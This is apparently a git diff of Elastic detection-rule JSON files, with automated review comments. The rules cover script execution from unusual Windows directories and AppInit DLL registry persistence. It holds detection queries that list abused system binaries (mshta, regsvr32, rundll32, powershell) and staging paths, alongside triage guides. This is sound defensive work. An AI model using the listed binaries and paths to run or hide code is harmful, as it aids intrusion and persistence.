entries.\n - 
!{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. 
Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of parent process executable and command line conditions.\n\n### Related rules\n\n- Process Execution from an Unusual Directory - ebfe1448-7fac-4d59-acea-181bd89b1f7f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Execution from Unusual Directory - Command Line\n\nThis rule looks for the execution of scripts from unusual directories. 
Attackers can use system or application paths to hide malware and make the execution less suspicious.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, 
pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of parent process executable and command line conditions.\n\n### Related rules\n\n- Process Execution from an Unusual Directory - ebfe1448-7fac-4d59-acea-181bd89b1f7f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to 
reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"wscript.exe\",\n \"cscript.exe\",\n \"rundll32.exe\",\n \"regsvr32.exe\",\n \"cmstp.exe\",\n \"RegAsm.exe\",\n \"installutil.exe\",\n \"mshta.exe\",\n \"RegSvcs.exe\",\n \"powershell.exe\",\n \"pwsh.exe\",\n \"cmd.exe\") and\n\n /* add suspicious execution paths here */\n process.args : (\"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\Users\\\\Public\\\\*\",\n \"C:\\\\Windows\\\\Tasks\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\AMD\\\\Temp\\\\*\",\n \"C:\\\\Windows\\\\AppReadiness\\\\*\",\n \"C:\\\\Windows\\\\ServiceState\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"C:\\\\Windows\\\\Branding\\\\*\",\n \"C:\\\\Windows\\\\csc\\\\*\",\n \"C:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"C:\\\\Windows\\\\en-US\\\\*\",\n \"C:\\\\Windows\\\\wlansvc\\\\*\",\n \"C:\\\\Windows\\\\Prefetch\\\\*\",\n \"C:\\\\Windows\\\\Fonts\\\\*\",\n \"C:\\\\Windows\\\\diagnostics\\\\*\",\n \"C:\\\\Windows\\\\TAPI\\\\*\",\n \"C:\\\\Windows\\\\INF\\\\*\",\n \"C:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"C:\\\\windows\\\\tracing\\\\*\",\n \"c:\\\\windows\\\\IME\\\\*\",\n \"c:\\\\Windows\\\\Performance\\\\*\",\n \"c:\\\\windows\\\\intel\\\\*\",\n \"c:\\\\windows\\\\ms\\\\*\",\n \"C:\\\\Windows\\\\dot3svc\\\\*\",\n \"C:\\\\Windows\\\\panther\\\\*\",\n \"C:\\\\Windows\\\\RemotePackages\\\\*\",\n \"C:\\\\Windows\\\\OCR\\\\*\",\n \"C:\\\\Windows\\\\appcompat\\\\*\",\n 
\"C:\\\\Windows\\\\apppatch\\\\*\",\n \"C:\\\\Windows\\\\addins\\\\*\",\n \"C:\\\\Windows\\\\Setup\\\\*\",\n \"C:\\\\Windows\\\\Help\\\\*\",\n \"C:\\\\Windows\\\\SKB\\\\*\",\n \"C:\\\\Windows\\\\Vss\\\\*\",\n \"C:\\\\Windows\\\\servicing\\\\*\",\n \"C:\\\\Windows\\\\CbsTemp\\\\*\",\n \"C:\\\\Windows\\\\Logs\\\\*\",\n \"C:\\\\Windows\\\\WaaS\\\\*\",\n \"C:\\\\Windows\\\\twain_32\\\\*\",\n \"C:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"C:\\\\Windows\\\\ShellComponents\\\\*\",\n \"C:\\\\Windows\\\\PLA\\\\*\",\n \"C:\\\\Windows\\\\Migration\\\\*\",\n \"C:\\\\Windows\\\\debug\\\\*\",\n \"C:\\\\Windows\\\\Cursors\\\\*\",\n \"C:\\\\Windows\\\\Containers\\\\*\",\n \"C:\\\\Windows\\\\Boot\\\\*\",\n \"C:\\\\Windows\\\\bcastdvr\\\\*\",\n \"C:\\\\Windows\\\\TextInput\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\schemas\\\\*\",\n \"C:\\\\Windows\\\\SchCache\\\\*\",\n \"C:\\\\Windows\\\\Resources\\\\*\",\n \"C:\\\\Windows\\\\rescache\\\\*\",\n \"C:\\\\Windows\\\\Provisioning\\\\*\",\n \"C:\\\\Windows\\\\PrintDialog\\\\*\",\n \"C:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"C:\\\\Windows\\\\media\\\\*\",\n \"C:\\\\Windows\\\\Globalization\\\\*\",\n \"C:\\\\Windows\\\\L2Schemas\\\\*\",\n \"C:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"C:\\\\Windows\\\\ModemLogs\\\\*\",\n \"C:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"C:\\\\$Recycle.Bin\\\\*\") and\n\n /* noisy FP patterns */\n\n not process.parent.executable : (\"C:\\\\WINDOWS\\\\System32\\\\DriverStore\\\\FileRepository\\\\*\\\\igfxCUIService*.exe\",\n \"C:\\\\Windows\\\\System32\\\\spacedeskService.exe\",\n \"C:\\\\Program Files\\\\Dell\\\\SupportAssistAgent\\\\SRE\\\\SRE.exe\") and\n not (process.name : \"rundll32.exe\" and\n process.args : (\"uxtheme.dll,#64\",\n \"PRINTUI.DLL,PrintUIEntry\",\n \"?:\\\\Windows\\\\System32\\\\FirewallControlPanel.dll,ShowNotificationDialog\",\n \"?:\\\\WINDOWS\\\\system32\\\\Speech\\\\SpeechUX\\\\sapi.cpl\",\n 
\"?:\\\\Windows\\\\system32\\\\shell32.dll,OpenAs_RunDLL\")) and\n\n not (process.name : \"cscript.exe\" and process.args : \"?:\\\\WINDOWS\\\\system32\\\\calluxxprovider.vbs\") and\n\n not (process.name : \"cmd.exe\" and process.args : \"?:\\\\WINDOWS\\\\system32\\\\powercfg.exe\" and process.args : \"?:\\\\WINDOWS\\\\inf\\\\PowerPlan.log\") and\n\n not (process.name : \"regsvr32.exe\" and process.args : \"?:\\\\Windows\\\\Help\\\\OEM\\\\scripts\\\\checkmui.dll\") and\n\n not (process.name : \"cmd.exe\" and\n process.parent.executable : (\"?:\\\\Windows\\\\System32\\\\oobe\\\\windeploy.exe\",\n \"?:\\\\Program Files (x86)\\\\ossec-agent\\\\wazuh-agent.exe\",\n \"?:\\\\Windows\\\\System32\\\\igfxCUIService.exe\",\n \"?:\\\\Windows\\\\Temp\\\\IE*.tmp\\\\IE*-support\\\\ienrcore.exe\"))\n", "related_integrations": [ { @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "cff92c41-2225-4763-b4ce-6f71e5bda5e6", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", 
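Review bot: The new `note` line's account-compromise step still reads `after the registry modification`, which does not match this rule (command-line execution from an unusual directory) and looks carried over from a registry-persistence guide; suggest `Analysts can do this by searching for login events (for example, 4624) to the target host after the suspicious execution.` Separately, on the unchanged `query` line in this hunk the `process.args` list contains `\"C:\\\\Windows\\\\security\\\\*\"` twice (after `ServiceState` and again after `TextInput`); the duplicate does not change matching but should be removed so the exclusion list stays reviewable. The remainder of the rule document continues past this hunk, and if this versioned JSON is a generated export the wording fix presumably belongs in the source rule rather than here.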
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -91,7 +91,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/cffbaf47-9391-4e09-a83c-1f27d7474826_1.json b/packages/security_detection_engine/kibana/security_rule/cffbaf47-9391-4e09-a83c-1f27d7474826_1.json
index 852cabf837d..8b9d49adb52 100644
--- a/packages/security_detection_engine/kibana/security_rule/cffbaf47-9391-4e09-a83c-1f27d7474826_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/cffbaf47-9391-4e09-a83c-1f27d7474826_1.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_4.json b/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_4.json
index 533bbb0aba6..6afe7eba144 100644
--- a/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_4.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_5.json b/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_5.json
index 3920fd00fcd..282ff88b790 100644
--- a/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_5.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_6.json b/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_6.json
index cfea06b87fc..e3692db56fa 100644
--- a/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_6.json
+++ b/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_6.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_7.json b/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_7.json
index a3fac00b3b3..06c14fe8d14 100644
--- a/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_7.json
+++ b/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_7.json
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_8.json b/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_8.json
index b639672bfff..abdf7a91267 100644
--- a/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_8.json
+++ b/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_8.json
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/d0b0f3ed-0b37-44bf-adee-e8cb7de92767_1.json b/packages/security_detection_engine/kibana/security_rule/d0b0f3ed-0b37-44bf-adee-e8cb7de92767_1.json
index 58d9466e20f..f3f6ab86b12 100644
--- a/packages/security_detection_engine/kibana/security_rule/d0b0f3ed-0b37-44bf-adee-e8cb7de92767_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/d0b0f3ed-0b37-44bf-adee-e8cb7de92767_1.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_102.json b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_102.json
index 12dcbb34967..6971ced8457 100644
--- a/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_102.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Registry Persistence via AppInit DLL", - "note": "## Triage and analysis\n\n### Investigating Registry Persistence via AppInit DLL\n\nAppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications.\n\nAttackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.\n\nThis rule identifies modifications on the AppInit registry keys.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related DLL file tied to the Windows Registry entry.\n - Check whether the DLL is signed, and tied to a authorized program used on your environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve all DLLs under the AppInit registry keys:\n - $osquery_0\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and the DLLs using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_1\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_2\n - $osquery_3\n - $osquery_4\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Registry Persistence via AppInit DLL\n\nAppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. 
The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications.\n\nAttackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.\n\nThis rule identifies modifications on the AppInit registry keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related DLL file tied to the Windows Registry entry.\n - Check whether the DLL is signed, and tied to a authorized program used on your environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve all DLLs under the AppInit registry keys:\n - $osquery_0\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and the DLLs using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_1\n - Use the Elastic Defend registry events to examine registry 
keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_2\n - $osquery_3\n - $osquery_4\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"HKLM\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\"\n ) and not process.executable : (\n \"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\Program Files\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\",\n \"C:\\\\Program Files (x86)\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\")\n", "related_integrations": [ { @@ -45,7 +45,7 @@ ], "risk_score": 47, "rule_id": "d0e159cf-73e9-40d1-a9ed-077e3158a855", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", 
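Review bot: The new `note` line still says `tied to a authorized program used on your environment`; it should read `tied to an authorized program used in your environment`, and the same sentence appears on the new `note` line of the `d0e159cf-73e9-40d1-a9ed-077e3158a855_103.json` hunk further down. The same new line also carries unexpanded `$osquery_0` through `$osquery_4` placeholders where the `_103` hunk embeds full `!{osquery{...}}` blocks, so this guide will render the bare tokens rather than runnable queries; if `_102` is a frozen historical rule version that is presumably intended and can be left as is. The rest of the rule document lies outside this hunk.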
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_103.json b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_103.json
index 50f7963c98d..0e8f2bd6b87 100644
--- a/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_103.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Registry Persistence via AppInit DLL", - "note": "## Triage and analysis\n\n### Investigating Registry Persistence via AppInit DLL\n\nAppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications.\n\nAttackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.\n\nThis rule identifies modifications on the AppInit registry keys.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related DLL file tied to the Windows Registry entry.\n - Check whether the DLL is signed, and tied to a authorized program used on your environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve all DLLs under the AppInit registry keys:\n - !{osquery{\"label\":\"Osquery - Retrieve AppInit Registry Value\",\"query\":\"SELECT * FROM registry r where (r.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows' or\\nr.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows') and r.name ==\\n'AppInit_DLLs'\\n\"}}\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and the DLLs using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User 
